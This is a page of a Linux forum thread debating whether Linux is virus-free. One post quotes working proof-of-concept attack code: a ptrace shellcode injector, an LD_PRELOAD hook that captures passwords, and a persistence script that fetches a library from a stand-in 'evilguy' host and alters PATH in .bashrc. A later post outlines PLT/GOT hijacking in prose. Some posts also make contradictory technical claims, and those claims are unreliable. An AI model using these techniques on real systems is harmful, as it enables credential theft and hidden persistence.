Find the answer to your Linux question:
Page 3 of 4 FirstFirst 1 2 3 4 LastLast
Results 21 to 30 of 32
Originally Posted by wisehacks It seems that you're not aware of what your talking about. You are saying you cannot modify another process running with your same user id or ...
Enjoy an ad free experience by logging in. Not a member yet? Register.
  1. #21
    khf
    khf is offline
    Just Joined!
    Join Date
    Mar 2009
    Location
    Moves between London, Oslom Brussels
    Posts
    30

    Other study the


    Quote Originally Posted by wisehacks View Post
    It seems that you're not aware of what your talking about. You are saying you cannot modify another process running with your same user id or read its data? Really? As you say, HAVE YOU EVER TRIED? Let's give you a simple POC. Look at this sample code:
    Code:
    #include <stdio.h>
    #include <unistd.h>
    
    int main(int argc, char** argv){
     int v = 5;
    
     while (1){
     printf("Meaning of life is %d\n", v);
     sleep(1);
     }
     return 0;
    }
    Lets just exec it:
    Code:
    [wisehacks@trantor ~]$ gcc -o victim victim.c 
    [wisehacks@trantor ~]$ ./victim 
    Meaning of life is 5
    Meaning of life is 5
    Meaning of life is 5
    ^C

    Code:
    #include <stdlib.h>
    #include <stdio.h>
    #include <unistd.h>
    #include <sys/ptrace.h>
    #include <sys/types.h>
    #include <string.h>
    #include <sys/user.h>
    #include <signal.h>
    #include <errno.h>
    
    // Machine code to inject, write() followed by exit(0)
    unsigned char code[]=
     "\x31\xc0\xb0\x04\x31\xdb\x43\xeb\x12\x31\xc9\x8b\x0c\x24\x31\xd2"
     "\xb2\x1c\xcd\x80\x31\xc0\x40\x31\xdb\xcd\x80\xe8\xe9\xff\xff\xff"
     "\x45\x6c\x20\x73\x65\x6e\x74\x69\x64\x6f\x20\x64\x65\x20\x6c\x61"
     "\x20\x76\x69\x64\x61\x20\x65\x73\x20\x34\x32\x0a";
    
    int main(int argc, char** argv){
     pid_t pid;
     int i;
     struct user_regs_struct regs;
    
     if (argc != 2){
     printf("Usage: %s <process id>\n",argv[0]);
     exit(1);
     }
    
     pid = (pid_t)atoi(argv[1]);
    
     printf("[?] Attaching to process %d...\n",pid);
     if (ptrace(PTRACE_ATTACH, pid,0,0) < 0){
     perror("[!] ptrace: ATTACH");
     exit(1);
     }
     printf("[+] Succesfully attached!\n");
    
    // Wait to be sure the process has stopped
     wait(NULL);
    
     printf("[?] Getting register information for the process...\n");
     if (ptrace(PTRACE_GETREGS, pid, 0, &regs) < 0){
     perror("[!] ptrace: GETREGS");
     exit(1);
     }
     printf("[+] Got eip pointing at 0x%x\n", (unsigned int)regs.eip);
    
     printf("[?] Injecting code at eip...\n");
     for (i=0;i<strlen(code);i++){
     if (ptrace(PTRACE_POKEDATA, pid, regs.eip+i,*(unsigned char*)(code+i))) {
     perror("[!]ptrace: POKEDATA");
     exit(1);
     }
     }
    
     printf("[+] Code injected succesfully!\n[?] Detaching...\n");
     // should check if the proc exists,
     // if it does, it should be stopped with sigstop before dettaching
     // if its stopped by the means of another signal, make it continue and
     // then stop it. If the process is part of a thread group things are a little more
     // complicated. But, hey, this is just a POC
     if (ptrace(PTRACE_DETACH, pid, 0, SIGCONT) == -1){
     if (errno != ESRCH){
     // shouldn't happen
     perror("[!] Detach: ");
     exit(1);
    
     }
     kill(pid, SIGCONT);
     }
     printf("[+] Done!\n");
     return 0;
    }


    Code:
    [wisehacks@trantor ~]$ ./victim 
    Meaning of life is 5
    Meaning of life is 5
    Meaning of life is 5
    Meaning of life is 5
    Meaning of life is 5
    Meaning of life is 5
    Meaning of life is 5
    Meaning of life is 5
    El sentido de la vida es 42
    (The message is in spanish, because I didn't want to change the binary code for this demo, but means the same as the english one). In the injector window we see:
    Code:
    [wisehacks@trantor~]$ gcc -o inject inject.c 
    [wisehacks@trantor ~]$ ps uax | grep -i victim
    wisehacks    6640  0.0  0.0   1496   328 pts/4    S+   09:00   0:00 ./victim
    wisehacks    6642  0.0  0.0   3916   768 pts/3    R+   09:00   0:00 grep -i victim
    [wisehacks@trantor ~]$ ./inject 6640
    [?] Attaching to process 6640...
    [+] Succesfully attached!
    [?] Getting register information for the process...
    [+] Got eip pointing at 0xf772c430
    [?] Injecting code at eip...
    [+] Code injected succesfully!
    [?] Detaching...
    [+] Done!
    Code:
    #include <stdio.h>
    #include <string.h>
    #include <stdlib.h>
    
    int send_pass(char* pass){
    	printf("Im gonna send the password %s over the network\n", pass);
    	// do stuff
    	return 0;
    }
    
    int main(int argc, char** argv){
    
    	char buffer[250];
    
    	if (argc!=2){
    		printf("Usage: %s <password>\n", argv[0]);
    		exit(1);
    	}
    	if (strlen(argv[1]) >= 250){
    		printf("Password is too long\n");
    		exit(1);
    	}
    	
    	strncpy(buffer, argv[1], 250);
    	send_pass(buffer);
    
    	return 0;
    }
    Now take a look at this "replacement" evil code:
    Code:
    #include <stdio.h>
    
    char *strncpy(char *dest, const char *src, size_t n){
    	char *ret = dest;
    	
    	printf("Your password have been owned, it was %s\n", src);
    	// do the same as strncpy so the user doesnt notice
    	do{
    		if (!n--)
    		return ret;
    	} while ((*dest++ = *src++));
    	while (n--)
    		*dest++ = 0;
    	return ret;
    }
    Compile it an run:
    Code:
    [wisehacks@trantor ~]$ gcc -Wall -fPIC -shared -o evilso.so evilso.c 
    [wisehacks@trantor ~]$ gcc -o victim2 victim2.c 
    [wisehacks@trantor ~]$ ./victim2 
    Usage: ./victim2 <password>
    [wisheacks@trantor ~]$ ./victim2 mypass
    Im gonna send the password mypass over the network
    [wisehacks@trantor~]$ LD_PRELOAD="./evilso.so" ./victim2 mypass
    Your password have been owned, it was mypass
    Im gonna send the password mypass over the network
    :
    Code:
    #!/bin/sh
    
    mkdir ~/.hidden
    cd ~/.hidden
    wget hxxp://evilguy/evilso.so
    echo "#!/bin/sh
            LD_PRELOAD=\"./evilso.so\" ls $@" >> ls
    chmod +x ls
    
    echo "PATH=~/.hidden:$PATH" >> ~/.bashrc
    .
    You seem to have never ever tried to code not to understand. In the first example - show how you can get it to print "6" instead of 5 - without modifying the source code and relinking other code. It is possible by starting the application in a debugger and patch "5" on the call stack to "printf" to "6". However, the next time you start the application - it will print 5, so what is the point?
    You can of course also write your own debugger that you can load with your favourite address maps, and make this modify the binaries. These are also files, fully modifiable, and we have done this for ages. I just fail to see how this is related to a "virus" or "hacking".

    For command hacking, this is the most common way of obtaining control of a *NIX computer. Once your ".hidden" contains all the Linux commands - /bin and /usr/bin - you can make it play "Pop goes the weazel". The remedy is however very simple: run "rm -f /.hidden/*.*" - yes I really wanna do this..

    Type in the command shell: echo $PATH - to see if there is a "$HOME/.hidden" in if
    You should remove the .hidden from your search path.
    Make a copy of the .bashrc: cp ~/.bashrc .bashrec.sav
    .. and: diff ~/.bashrc .bashrc.sav
    Will show any differences, and restore by cp .bashrc.sav ~/.bashrc

    You can "chmod" the file to read-only, this will only make some scripts fail when they try to update the startup-script, good scripts will prompt you to change access to the file. Now, compare with Windows: How much protection do you find on the registry? - and on the "RUN" keys? - nada!!!

  2. #22
    Just Joined!
    Join Date
    Apr 2010
    Posts
    7
    Quote Originally Posted by khf View Post
    oh yes - you just illustrated my point well DumbHack.
    And here we go again...

    Quote Originally Posted by khf View Post
    It is fully possible to attach in a running application sequence that is a subshell of current executing shell.
    What??? Stop speaking nonsense. Im attaching to a process running from another shell. Moreover, you can use my example and attach to a process running from the desktop. No subshell at all.

    Quote Originally Posted by khf View Post
    Here you kill the previous application to release the output stream and print something else does not impress me much and doubtfully anyone else.
    I do WHAAAT? READ THE ****ING CODE, and if you are not able to understand it, learn programming first. I do NOT kill the previous application. I inject code that it will exec, it's just my example injects a write syscall and a exit syscall, but if I don't exit, the victim would continue executing after my injection.

    Quote Originally Posted by khf View Post
    This is not "hijacking" it is reading the exit value of an application that terminates and "do something". This is how workflow is implemented - you place code at the end, check exit status and decide on "next application" based on the status code.
    More nonsense here! Great! Where am I reading the exit value of what? Im starting to think that you are kidding or are fairly ignorant.

    Quote Originally Posted by khf View Post
    But out of curiosity: how do you intend to run this inside a browser window or as an email attachment. Kill the browser and restart it? Do not assume that people are silly.
    If you had understood a half of what I posted before, you would have realized that It's possible to inject into the browser and read IT'S memory while it's running. It's not necessary to kill it and restart it.

    Of course, to use LD_PRELOAD in front of the binary you need to kill it and restart it. But that is just an example of how syscalls can be intercepted. If you were smart enough, would know that instead of injecting write() and exit() in the above example, you can inject a dlopen() or simply overwrite the memory where the code of the function lives. But as you are demonstrating, you're an expert talking nonsense.

    Quote Originally Posted by khf View Post
    The final example is vastly too complex for most here, but essentially it is the loading procedure. You illustrate my point that it is fully possible to make silly applications on Linux too. But it use a loading / linking procedure. Should a script suddenly start to reload and relink Thunderbird and Firefox, I would certainly download a clean version from the Mozilla site.
    How confused you are. The last example (the bash script) would work as follows: it will deploy on your system and never reload or relink anything. It will just wait till you reboot and launch the apps yourself again. Anyway thats just a stupid sample.

    Quote Originally Posted by khf View Post
    A virus works without without modifying the existing executable file.
    This is incredible xDD You are saying, wait, you say that, oh god. You say that the viruses don't infect other executables? Really? Serious?Most virus infects the executable files or dll files of the system. You can bet it. Even wikipedia knows about it:
    Quote Originally Posted by Wikipedia
    In order to replicate itself, a virus must be permitted to execute code and write to memory. For this reason, many viruses attach themselves to executable files that may be part of legitimate programs. If a user attempts to launch an infected program, the virus' code may be executed simultaneously.
    Viruses have targeted various types of transmission media or hosts. This list is not exhaustive:

    * Binary executable files (such as COM files and EXE files in MS-DOS, Portable Executable files in Microsoft Windows, the Mach-O format in OSX, and ELF files in Linux)
    Arguing with you, proven that don't know what you talk about is quite pointless. So please, read the code, try it yourself, understand the concepts beneath it. Noone cares what you think when the evidences are on the table.

  3. #23
    khf
    khf is offline
    Just Joined!
    Join Date
    Mar 2009
    Location
    Moves between London, Oslom Brussels
    Posts
    30
    [QOUTE]
    :
    :
    Arguing with you, proven that don't know what you talk about is quite pointless. So please, read the code, try it yourself, understand the concepts beneath it. Noone cares what you think when the evidences are on the table.[/QUOTE]

    I fail to see any evidence, you show how to intercept a code by attaching to it, but not how to modify it quietly and leave without trace.

    I will not respond to your self-indulgence. Your code just exemplifies your ignorance of the problem and illustrates how difficult it is to plant a virus on Linux.

    Now I ask you to stop harassing this forum.

  4. #24
    Just Joined!
    Join Date
    Apr 2010
    Posts
    7
    Quote Originally Posted by khf View Post
    I fail to see any evidence, you show how to intercept a code by attaching to it, but not how to modify it quietly and leave without trace.
    Use a little of imagination, don't make me code it, please. Assume the code you want to inject is 100 bytes length. Great, then, you attach to the process, resize the text section, inject your 100 byte code, replace PLT/GOT entries (maybe add some symbols to the symbol table if required) so that your code is called instead of the original functions. Then detach and you are done.

    Other way, if you just want the victim to exec smth like dlopen(evil.so) and then continue executing (but now calling to the funcs in evil.so), just do this. Attach, get EIP, save the next 100 bytes (assume your code is 100B length), copy your code there (your code should end with a trap call), make the victim cont (PTRACE_CONT). When it stops again, put the victims code back in place, detach; you're done.

    Quote Originally Posted by khf View Post
    I will not respond to your self-indulgence. Your code just exemplifies your ignorance of the problem and illustrates how difficult it is to plant a virus on Linux.
    Blah, blah, blah.

    What do you need as a proof? This is quite absurd.

  5. #25
    Linux Guru bigtomrodney's Avatar
    Join Date
    Nov 2004
    Location
    Ireland
    Posts
    6,133
    Okay folks, let's try and keep it to a loud whisper here.

    If this issue can't be resolved amicably the thread will be locked.

  6. #26
    khf
    khf is offline
    Just Joined!
    Join Date
    Mar 2009
    Location
    Moves between London, Oslom Brussels
    Posts
    30

    Summary..

    Quote Originally Posted by vndpundir2007 View Post
    hello
    I have listened that linux is virus free.Is that true? If yes then whats is the reason behind this??
    As you read above, it is pretty difficult to make a virus that is malicious on Linux, but not impossible.
    One reason is that it is impossible to read the address space of another application, so the password you type in, remains in the application that you type it in, unless this hands it uncoded to another application that publish it on the net.

    However, it is possible to make an applications that attach to any memory, and reads the data as off a file. You need to write a "debugger" that knows where to find the data, then link this to your application apparently without anyone noticing anything such as the prompt that my email browser comes with "Whoops, a script module was started, do you want to execute this?". I am certain that "WackHack" and others has ways to stop that dialogue to appear.

    When we designed X/Windows, we knew about malicious code, hence fields are protected. When M$ acquired Windows (they did not develop it) they acquired a field scripting language / screen manager with memory management. Since the fields are exposed, and the kernel debugger is exposed, it is simple to make applications that "does anything". So, Windows is a system development package without any security because during application development you need to have all options open.

    The biggest villain in Linux is usually yourself, because the system cannot stop you from doing silly things.
    Linux has retained the flexibility of Unix, exposing configuration details so that "WackHack" and others can muck around with your system and make it play the tunes he likes. This is a design decision - flexibility. Any changes that others do will be seen by you and approved by you (but you may have to run e.g. a firewall that detects their execution). All changes should therefore be done through your system management "package" only and with a full explanation. So, stick to one shell and limit the complexity.

    Don't worry - it is not possible to link into your browser or email client without some very advanced footwork that includes obtaining the address map of your particular browser or email client. It would be vastly simpler to remake the entire Java VM and here sniff at all goodies.

  7. #27
    Linux Engineer nujinini's Avatar
    Join Date
    Apr 2009
    Posts
    1,272
    Quote Originally Posted by bigtomrodney View Post
    Okay folks, let's try and keep it to a loud whisper here.

    If this issue can't be resolved amicably the thread will be locked.
    hi folks,

    nujinini
    Linux User #489667

  8. #28
    Just Joined!
    Join Date
    Aug 2008
    Posts
    48
    I am going to keep this simple and with the original question. Linux is much more secure over all then Windows. But as it has been said nothing is 100%. Windows does have more virus's, etc. then Linux does.

    When I was on Windows only I use to have to check things constantly. In Linux I still check things but I am a bit more relaxed, unless I have reason to be more alert.

    Right now I use

    rkhunter -c
    chkrootikit
    and I also have clamtk installed just in case I feel I need to run that. I have never had issues yet.

    With Linux iptables (For Firewall) are great. I do use Firestarter and just make sure things are locked down and simple (I also have a router/firewall.)

    Security is up to the user and common sense. How ever with Windows if someone whispers virus from another room it gets infected lol

  9. #29
    Linux User martinfromdublin's Avatar
    Join Date
    Dec 2004
    Location
    Dublin, Rep. of Ireland
    Posts
    446
    Can we focus on the original question & save the debate for the Coffee Lounge? Vndpundir2007 asked about the treat of viruses to his Linux system & the answer is the threat is unlikely but not impossible. Therefore;

    1) Deploy a firewall-if you don't have one download one, if you need assistance, ask here & assistance shall be given.
    2) Use a complex root password that can't be easily guessed & this should not be the same as your login password.
    3) Be careful entering your credit card number on-line, consider using a third party such as Pay-Pal who store the card number but never reveal it to those you are purchasing from.
    4) Use an NAT (Network Address Translation) device, most home wireless routers & network devices use NAT by default.
    5) Use your common sense! You are safer with Linux but nothing is perfect.
    LINUX: Where do you want to go.......Tomorrow!

    Registered Linux user 396633

  10. #30
    Just Joined!
    Join Date
    Aug 2008
    Posts
    48
    the answer is the threat is unlikely but not impossible
    Perfect. That pretty much sums it up right there.

Page 3 of 4 FirstFirst 1 2 3 4 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •